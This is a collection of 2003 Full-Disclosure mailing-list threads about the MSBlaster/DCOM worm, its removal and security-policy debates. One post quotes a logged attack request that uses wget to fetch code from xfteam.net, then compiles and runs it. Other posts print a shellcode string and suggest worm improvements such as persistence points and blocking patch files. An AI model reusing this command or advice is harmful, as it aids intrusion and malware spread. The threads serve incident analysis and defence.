Re: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
actually the closer i look at c4 i think it might just be sd's bindtty.c which is part of suckit. char sig[]=\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80; Dan wrote: Hi, Our Snort picked up an interesting attempt to download, compile and execute. Noting also the fact that the sub dir its attempting to access has not been there for over 4 months(/logjam/)? Has anyone actually seen what this fedor.c is? I have done some google'ing but it comes up blank. Has anyone else noticed this kindof request recently? Is it just me or is xfteam.net not resolving anyway? Orignal HTTP request: GET /logjam/showhits.php? rel_path=http://xfteam.net/cmd.txt?cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f Breaking this down we get(twice): uname -a cd /tmp wget http://xfteam.net/fedor.c gcc -o f fedor.c ./f Regards, Daniel. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MsBlaster Source?
if ( !MyStartService(szServiceTftpd) ){ does appear so. Seems like there is more code that's not here. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jerry Heidtke Sent: Friday, August 29, 2003 6:59 PM To: Shanphen Dawa; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] MsBlaster Source? That's the source to Nachia/Welchia. -Original Message- From: Shanphen Dawa [mailto:[EMAIL PROTECTED] Sent: Friday, August 29, 2003 5:01 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] MsBlaster Source? Can anyone, who is obviously better at coding then I, verify the rumours that the following link, is the source to msblaster? https://www.xfocus.net/bbs/index.php?act=STf=1t=26924 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Confidentiality Notice: This e-mail message, including any attachments, is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
He'll more likely go to prison for 10-20. That's if he's lucky. I'm certain he will be made an example of. Poor dumb bastard. He wanted attention, now he's got it. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Richard M. Smith Sent: Friday, August 29, 2003 6:36 PM To: 'Jerry Heidtke'; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect The FBI followed the same steps that you outlined to locate Jeffrey Parson according to his indictment papers. The FBI also got an IP address for Jeffrey which traced back to his house from the hosting service for t33kid.com. Moral of the story: If you want to be a successful cybercriminal, remember to always hide behind proxy servers and don't use your real name and address when registering a domain name. If found guilty, I think an appropriate sentence is to make him clean up virus infected computers in public schools for a year. Richard -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jerry Heidtke Sent: Friday, August 29, 2003 4:47 PM To: the lumpalaya Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a script-kiddie that goes by teekid, he's got a web site called t33kid.com, the whois for the domain gives his real name and address. Enough probable cause to get a warrant right there. Jerry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] CERT Employee Gets Owned
But seriously, sex with minors isn't exactly a parking ticket. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Kurt Seifried Sent: Monday, August 25, 2003 6:29 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] CERT Employee Gets Owned Please read the list charter and stop posting junk like this. Do we know post stories about any criminal charges brought against anyone in the security industry? Should we also cover parking tickets? Kurt Seifried, [EMAIL PROTECTED] A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574 http://seifried.org/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] JAP back doored
Except the US, we have jurisdiction over the world apparently. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Drew Copley Sent: Thursday, August 21, 2003 3:50 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] JAP back doored -Original Message- From: Florian Weimer [mailto:[EMAIL PROTECTED] Sent: Thursday, August 21, 2003 12:23 PM To: Drew Copley Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] JAP back doored Drew Copley [EMAIL PROTECTED] writes: Why is the state of Germany trojanizing applications which may be run by anyone on the planet? Why is the U.S. government interfering with the publication of security advisories if the corresponding software is being run throughout the world? I haven't had any problem issuing security advisories. What is this in reference to? Pointing the finger elsewhere does not excuse the fact that the German State has trojanized a popular application which was open to the world to download. And, indeed, the world did download. Here are some things I do not care if Germany does: - I don't care if they listen to their own wires - I don't care if they hack into their own criminals systems - I do not care if they use zero day to do this - I do not even care if they hack into criminals systems in other countries if they have some jurisdiction in this and are working with other authorities. For instance, if they were hacking into terrorist networks which spanned across the world and were sharing this information, I would not care. A German cop has no jurisdiction over me. He has no jurisdiction over anyone outside of Germany. This is the same for every country. The German government funds the AN.ON project, but allowed for a great deal of independence. Naturally, this independence does not extend to the law, thanks to separation of powers. Now a judge has forced the operators to implement a surveillance interface, which is possible because of a design weakness. But that's just the beginning of the legal process. The project has announced that it plans to fight, but within the legal system. This does not absolve them, nothing you can say absolves them. I realize you have some patriotism here and are speaking from this... But, I also know you do not want the US government to backdoor US applications from US companies without telling you. I know this to be true. How is it they believe they have a right to trojanize someone outside of Germany? Nobody forces you to use the German service if you don't trust the operators or (thanks to recent events) German law enforcement. That is an empty argument not worth going into. This is blatantly illegal in just about every country outside of Germany. Literally. No, it isn't. Most countries with communication infrastructure have laws that regulate law enforcement access. This is not a stupid local law issue. This also is an empty argument. Basically, you are saying if it is discovered the NSA has a backdoor in Windows, that this is okay and no one has a right to complain, even if they are outside of the US. I doubt this would be your case in this situation. I am sure many could say, Well, this situation is different. No, it is not. Let's be honest here. Your country is eavesdropping foreign communication as well. My country has not installed a trojan on my system, to my own knowledge, all rumors and speculation aside. They have not hacked into my system. As to what wires they listen to, if they listen to their own, that is their business. We have encyption software. If they listen to other people's wires, that is outside of their domain, then yes, this should be illegal. But, is it proven? Does it remove the fact that there are a host of privacy and anonymity tools which we can use? But, Germany has decided that people don't have a right to use these tools. They have not tried to do even the honorable thing and break these things - which is illegal - but they have secretly trojanized the code. You want me to applaud this? Maybe your nation has just given my own nation some new ideas. Did you help stop this trend? Or, do they believe they are superior to other countries, and they may invade at will? Please check the facts. Germany doesn't an operate eavesdropping base in the U.S., but the U.S. do in Germany. I won't even go into that. I do not know what they do there, but their rights have been worked out with the German government. If you have an issue with that, you need to take that up with their government. If my government allowed German police to trojanize an application I ran and my government covered this up... I would be furious at my government first, and at Germany second. But, none of this is dealing with the matter at hand. These arguments are all a distraction. I have not intended to offend your patriotic sensibilities. My
RE: [Full-Disclosure] DCOM Worm released
Today will go down in history as the day the whole damned world got owned. I have so many machines infected with so many things it's insane. I'll be reverse engineering until 2004. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Dennis Opacki Sent: Monday, August 11, 2003 5:41 PM To: Full-Disclosure (E-mail) Subject: Re: [Full-Disclosure] DCOM Worm released Can anyone confirm whether the tftp transfers appear to be solely from the hosts listed in the initial sans.org note (which now appear to have been taken down), or is the transfer done from the infecting host? TIA, -Dennis On Mon, 11 Aug 2003, Joey wrote: They found a worm, but since it uses tftp servers that can be taken down and since tftp is slow, it shouldnt have much of an effect. Scans sequentially for machines with open port 135, starting at a presumably random IP address - very stupid way to spread! http://isc.sans.org/diary.html?date=2003-08-11 __ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Red Bull Worm
Because that movie sucked. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever Sent: Thursday, August 07, 2003 12:19 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Red Bull Worm Why not call it SkyNet, after T3 ? SkyLined - Original Message - From: Joel R. Helgeson [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, August 07, 2003 17:53 Subject: [Full-Disclosure] Red Bull Worm Lets see, the last big worm to exploit windows was named Code Red after the Mountain Dew Code Red was brought to market. Being that this worm is much more effective than Code Red ever was, I say worm should be named Red Bull as it is sure to exhibit much more energy than the Code Red worm. Original Message - From: Stephen [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, August 07, 2003 5:25 AM Subject: [Full-Disclosure] DCOM Worm/scanner/autorooter !!! Hello here, a new worm is on the wild, it uses the exploit released by k-otik (48 targets - http://www.k-otik.com/exploits/07.30.dcom48.c.php) look this shit : /* RPC DCOM WORM v 2.2 - * This code is in relation to a specific DDOS IRCD botnet project. * You may edit the code, and define which ftp to login * and which .exeutable file to recieve and run. * I use spybot, very convienent * - * So basicly script kids and brazilian children, this is useless to you * So PATCH PATCH PATCH and block the ports 135 - 139 -445 - 593 Regards. Stephen - Germany __ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] aside: worm vs. worm?
Are you basically saying that MS deserves no sympathy and should stand up and take responsibility for the silliness inherent in their OS source code? If that's what you're saying, then I have to agree. The word debacle comes to mind here. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Darren Reed Sent: Tuesday, August 12, 2003 4:13 AM To: Andrew J Homan Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] aside: worm vs. worm? In some mail from Andrew J Homan, sie said: It seems that between the time dcom.c first starting popping up around the internet and today, there was ample time for someone to write and release a worm designed to patch infected systems and remove any sign of itself. Given that on the 16th of this month windowsupdate.com will be DDOSed, does anyone else see this as an opportunity for a war of worms with windowsupdate.com at stake? Would anyone consider releasing a patching worm on their own network if they knew it wouldn't spread to the rest of the internet or is there a downside to this notion which I'm not realizing? You know, if the DDoS was targetted at someone innocent, I might be more sympathetic towards the problem of a web site being DDoS'd. But it's Microsoft's own web site that is being targeted and it is through their own bug that it is being made possible. As much as they would like to point the finger at others for making the code available to do it, if their software didn't have the bug, it would not be possible it all. Hrm, I don't really want to start _THAT_ discussion again, but I don't think you will find much, if any, sympathy for Microsoft being targetted by this worm. They're a large, rich, monopoly of a company. Do they really deserve any nice sympathy at all ? I suspect I'm not alone in these feelings. Darren ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] aside: worm vs. worm?
I think you are probably missing the obvious privacy issues. However if this were something that stopped at your edge, then I would Refer to it more as an automated patch agent, rather than a worm. It's less threatening. Something like this would be trivial to write, especially if it were to be used in a controlled environment. You should also consider that if it were to only patch machines within your network, that possibly traversal would be unnecessary, a scanner that was capable of patching would do the trick. Even a Perl script to wrap one of the many DCOM exploits available that could tftp the patch to the machine and execute it would probably suffice in most cases, assuming there is a way to make the patch install silently and force a reboot. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Andrew J Homan Sent: Monday, August 11, 2003 9:55 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] aside: worm vs. worm? It seems that between the time dcom.c first starting popping up around the internet and today, there was ample time for someone to write and release a worm designed to patch infected systems and remove any sign of itself. Given that on the 16th of this month windowsupdate.com will be DDOSed, does anyone else see this as an opportunity for a war of worms with windowsupdate.com at stake? Would anyone consider releasing a patching worm on their own network if they knew it wouldn't spread to the rest of the internet or is there a downside to this notion which I'm not realizing? Andrew J. Homan Software Engineering Intern http://www.cnt.com/ NOTE: Views and/or opinions expressed are not those of CNT. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: Re:::::: [Full-Disclosure] future happenings..
You all focus on a worms potential for destruction too much. What about threats that affect the real world. For instance Theft of data on a massive scale. We've already seen worms That do this. Or worse DDOS networks that can be uses as weapons Against foreign governments or even our own to disrupt or confuse. I think wiping the HDD of machine is probably too overt and furthermore Rather pointless as it will make it that much harder for the worm to spread Once the damage is done. For instance if the machine reboots, the OS will Fail to boot and the worm will fail to go on another run. I'd start looking More towards the blended threat as Symantec seems to put it. And more Advanced tools allowing people to create worms without much technical knowledge. There are a few already out there, I'm certain this will Only get worse. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of yossarian Sent: Tuesday, August 12, 2003 6:14 PM To: [EMAIL PROTECTED] Subject: Re: Re:: [Full-Disclosure] future happenings.. Well, basically, any OS on any platform will be vulnerable when people don't upgrade - when people care to write a virus or worm for it. Thats why MS is affected - why code for the few BeOS users? They might all three be on holiday and the worm might dud. At least we'll have enough bandwidth then. Kidding aside - worse worms can be made, and probably will be. It is an arms race. Technically much worse is possible. Whiping HDD is one thing, set track0=bad or reprogramming parts of standard hardware might be worse - like going after a pentium4 processor or the BIOS. - Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, August 12, 2003 9:01 PM Subject: Re:: [Full-Disclosure] future happenings.. -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Just reading through how easily this worm (RPC/DCOM/MSBlast) is spreading, and how widespread it is, and the potential number of infected systems - - do some of you lot think its feasible that sometime in the future someone will release a worm that DOES completely wipe the hard disks or do something equally nasty to its host AFTER sending itself on to 'x' recipients? Let us hope so as it will be the only way the people will ever learn to stop purchasing this product. Corps and individuals alike will finally see through the charade of this company's code. The purchasing decision makers at Corps have far too long enjoyed the silent kickbacks, the las vegas hooker runs financed by the weasel sales teams of the company that churns out this code. The hoodwinking of the IT dept. shall come to an end, when the likes of senior management and even the CEO at the top, all can no longer find that kiddie porn they downloaded for their daily wank just the other day. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 wkYEARECAAYFAj85OWgACgkQTAj0ZSCgbx7boACfarwZKw0vgSe6B4FYKXb6IeDAa0IA n0epylY7zc/aL5hbj8j0BYiLMTkN =vcaQ -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messengerl=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliatel=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] smarter dcom worm
Maybe even some polymorphic code and PE injection. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of SPAM Sent: Wednesday, August 13, 2003 12:56 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] smarter dcom worm imho netbios and tftp are good enough transport and better then ftp since there would be much more overhead bandwidth with ftp but should it propagates through emails too that'd be much better.. as most backbone and isp gives high priority to emails... and yes i agree the payload should be more intresting.. such as invecting files and such rather then doing a DDOS... just my $0.02 Ed - Original Message - From: gml [EMAIL PROTECTED] To: 'Justin Shin' [EMAIL PROTECTED]; '[EMAIL PROTECTED]' [EMAIL PROTECTED] Sent: Wednesday, August 13, 2003 6:57 AM Subject: RE: [Full-Disclosure] smarter dcom worm I agree with Justin. You would think that by now someone would write a random address generator that would solve the obvious timing problems that Most worms seem to suffer from. I was thinking more along the lines of Generating a random IP but on the first 3 octets and going through the Entire class C. Also, why did this worm carry around a dummy tftp server? NetBIOS is available as a transport method natively in the target OS. Don't get me wrong NetBIOS isn't the most reliable of network file systems But it is certainly more lightweight to use this approach than an embedded tftp server. I think it also solves that whole filtering problem to an extent. I am also not trying to encourage, this worm was a serious pain for me this week as I imagine it was for a lot of people. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Justin Shin Sent: Tuesday, August 12, 2003 6:32 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] smarter dcom worm As many people have said, this worm sucks. First of all, look at the host discovery mechanism. Random IP's are so outdated. A better idea? Start with: 1. Subnet (192.168.x.x) 2. WAN Address [for nat's] (24.31.34.x) 3. Incremental WAN (24.31.x.x) Obviously not a new idea but also not a bad one. I am sure that your average college-level math professor could simplify the host discovery process. tftp: slow, old, but easy to use. probably straight up ftp would be a better dropping protocol, no? registry/run is the oldest known startup method. try actually using MULTIPLE startups, like Registry RunServices, RunOnce, RunServicesOnce, AUTOEXEC.BAT, SYSTEM.INI, WIN.INI, WINSTART.BAT, WINITIT.INI, CONFIG.SYS ... etc. once installed, the program should spawn copies of itself, using startup methods, hidden files, fake system exes, etc. it should block out filenames of patches, windowsupdate stuff, fixes, to stop newbies from fixing it. the worm should also have a more interesting payload -- such as lookin at inetpub and htdocs, etc. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] dobble-clicking msblast.exe
I would think it would try to copy itself to %systemroot%\system32 find that it doesn't have access to overwrite msblast.exe and then just keep executing, but then again. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nick FitzGerald Sent: Tuesday, August 12, 2003 11:20 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] dobble-clicking msblast.exe martin f krafft [EMAIL PROTECTED] wrote: Does anyone know what happens if you run msblast.exe on an uninfected system? It becomes infected and infective. There is nothing especially magical about the features of the worm program -- run it and it starts trying to spread (or to DoS windowsupdate.com depending on the date). Its function is certainly not affected by the way it gets onto a machine or whether it is launched by the exploit code or not (well, it may depend on some elevated privileges such as the those it gets as local system from the RPC exploit code running, as it does, as part of a system service). -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] smarter dcom worm
I agree with Justin. You would think that by now someone would write a random address generator that would solve the obvious timing problems that Most worms seem to suffer from. I was thinking more along the lines of Generating a random IP but on the first 3 octets and going through the Entire class C. Also, why did this worm carry around a dummy tftp server? NetBIOS is available as a transport method natively in the target OS. Don't get me wrong NetBIOS isn't the most reliable of network file systems But it is certainly more lightweight to use this approach than an embedded tftp server. I think it also solves that whole filtering problem to an extent. I am also not trying to encourage, this worm was a serious pain for me this week as I imagine it was for a lot of people. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Justin Shin Sent: Tuesday, August 12, 2003 6:32 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] smarter dcom worm As many people have said, this worm sucks. First of all, look at the host discovery mechanism. Random IP's are so outdated. A better idea? Start with: 1. Subnet (192.168.x.x) 2. WAN Address [for nat's] (24.31.34.x) 3. Incremental WAN (24.31.x.x) Obviously not a new idea but also not a bad one. I am sure that your average college-level math professor could simplify the host discovery process. tftp: slow, old, but easy to use. probably straight up ftp would be a better dropping protocol, no? registry/run is the oldest known startup method. try actually using MULTIPLE startups, like Registry RunServices, RunOnce, RunServicesOnce, AUTOEXEC.BAT, SYSTEM.INI, WIN.INI, WINSTART.BAT, WINITIT.INI, CONFIG.SYS ... etc. once installed, the program should spawn copies of itself, using startup methods, hidden files, fake system exes, etc. it should block out filenames of patches, windowsupdate stuff, fixes, to stop newbies from fixing it. the worm should also have a more interesting payload -- such as lookin at inetpub and htdocs, etc. note -- im not trying to encourage this stuff, i am just pointing out some key flaws in this worm. the next one may have all of these features and much more, because I am not a very creative guy. -- Justin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] DDoS on the 16th - Fail if no DNS resolution?
_data:004047EC aWindowsupdate_com db 'windowsupdate.com',0 that's what I have. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of northern snowfall Sent: Wednesday, August 13, 2003 10:10 PM To: Jason Witty Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] DDoS on the 16th - Fail if no DNS resolution? Has anyone tested this worm yet to see what it'll do if you set up an internal DNS entry for windowsupdate.com to point to a black hole address (127.0.0.1 for example) and then set the system clock to be August 16th (this Saturday)? Has anyone taken the time to read the assembly to see if the worm exits if it can't find an IP? Rather than point windowsupdate.com to 127.1, just force your dns to return lookup failure. If the worm sees an error when it performs a URL lookup, maybe it dies. It wouldn't have *anything* to DoS. Don http://www.7f.no-ip.com/~north_ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] recent RPC/DCOM worm thought
Why build in a backdoor when you can just write crappy code? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Kerry Steele Sent: Wednesday, August 13, 2003 3:20 PM To: Eichert, Diana; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] recent RPC/DCOM worm thought Interesting thought, but I would have to say that it really goes deeper than that. If Microsoft were as evil an empire as they are perceived to be, then wouldn't they already have the backdoor to your system to apply the patch anyway? If so then why go throught the pain in the ass to write a shotty worm and draw bad publicity to the company? Think about the anti-virus companies and, well, every security software product out there, that is racing to be the first to detect or remediate X new variant of the worm. What an opportunity for market traction and visibility, wouldn't you say? My USD 0.02. Cheers, Kerry -Original Message- From: Eichert, Diana [mailto:[EMAIL PROTECTED] Sent: Wednesday, August 13, 2003 7:42 AM To: '[EMAIL PROTECTED]' Subject: [Full-Disclosure] recent RPC/DCOM worm thought I've been thinking about how poorly this worm was written and how it really wasn't very malicious, just very time consuming, forcing people/companies to install patches to their systems. Now here's an alternative thought about it. What if someone purposely wrote this worm to get the attention of people to patch their systems, not to DOS the mickeysoft upgrade site. If they really wanted to create a DOS against a website they wouldn't have postponed it for 4 days. That's a long time in today's world. I mean if you were mickeysoft and there was a known security hole wouldn't it be in you best interest to have the first real exploit of it be relatively benign? It gets everyone's attention and they are forced to install the latest security patch. anyway, my US$.02 worth ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] PHRACK 61 IS OUT !
Hah, if it was a Windows box you should have just rooted it. Hahhaha. Sorry I couldn't resist. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of del Sent: Tuesday, August 12, 2003 7:44 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] PHRACK 61 IS OUT ! WERE SORRY ABOUT THE DELAY, TEAM TESO WAS IN A VERY BAD CAR CRASH :( Luckily, one member gave us his password in the hospital and we were able to retrieve p61 from his computer and post it! -- http://phrack.efnet.ru/phrack/ Enjoy. Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messengerl=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliatel=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] what to do
I've been doing this: 1. patch the machine 2. remove registry entries containing msblast.exe 3. reboot 4. remove msblast.exe It's worked out so far. Yes I agree I wish people would listen when you tell them to patch. I have it on good authority that firewalls can't stop stupidity, I guess we're lucky this one wasn't also a mass mailing worm. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Calvyn Sent: Tuesday, August 12, 2003 1:16 AM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] what to do I'm was just working with my 15 year old niece in NJ, through IM, to help her keep her WinXP PC from rebooting every minute. She had 2 copies of msblast.e x e on her PC. One was delete-able the other we had to reboot into safe mode to delete. After deleting the last e x e her unit is NOT rebooting. I have since had her update her unit and disable DCom. Amazing how kids never listen to you when you ask them to update their PCs.. -Calvyn- -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of akbara Sent: Tuesday, August 12, 2003 1:52 AM To: Gabe Arnold; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] what to do has she tried booting into safe mode ? then removing the msblast or what not program ? -akbara - Original Message - From: Gabe Arnold [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, August 11, 2003 7:57 PM Subject: Re: [Full-Disclosure] what to do Don't use windose sounds like a solution to me... * Justin Shin ([EMAIL PROTECTED]) wrote: Hi All -- My cousin recently got a nasty RPC/DCOM worm and she cannot use Windows update because when the RPC is shutdown, SYSTEM automatically initiates a shutdown of the computer as you are all aware of. What is the best solution to keep data files intact while removing this worm? I have tried going to the Registry Run, no entries ar ethere besides legitimate startup stuff. Any suggestions? -- Justin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] aside: worm vs. worm?
In fact, you could probably take that kaht2 source and modify it to drop a patch payload instead of a Trojan. Please whatever you do, don't write a worm, we already have enough traffic for the moment ;-) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Andrew J Homan Sent: Monday, August 11, 2003 9:55 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] aside: worm vs. worm? It seems that between the time dcom.c first starting popping up around the internet and today, there was ample time for someone to write and release a worm designed to patch infected systems and remove any sign of itself. Given that on the 16th of this month windowsupdate.com will be DDOSed, does anyone else see this as an opportunity for a war of worms with windowsupdate.com at stake? Would anyone consider releasing a patching worm on their own network if they knew it wouldn't spread to the rest of the internet or is there a downside to this notion which I'm not realizing? Andrew J. Homan Software Engineering Intern http://www.cnt.com/ NOTE: Views and/or opinions expressed are not those of CNT. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] east coast powergrid / SCADA [OT?]
Are you saying that Open Source software can save us from power grid cascading failure? Heh, I sure hope they weren't running any GNU software On anything important. Actually I heard that it was a lightning strike in Canada that hit a transformer and overloaded the grid causing the others to Break and that's the problem. Maybe it's really Canada aboot to start a war eh? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of KF Sent: Thursday, August 14, 2003 6:54 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] east coast powergrid / SCADA [OT?] Anyone wanna comment on SCADA and the cascading failure that happened today in the north east, like potential for a similar outage from a cyber based attack, etc? Sorry ... I need to read about something other than blaster before I go insane. =] -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Symantec has released an MSBLast removal tool.
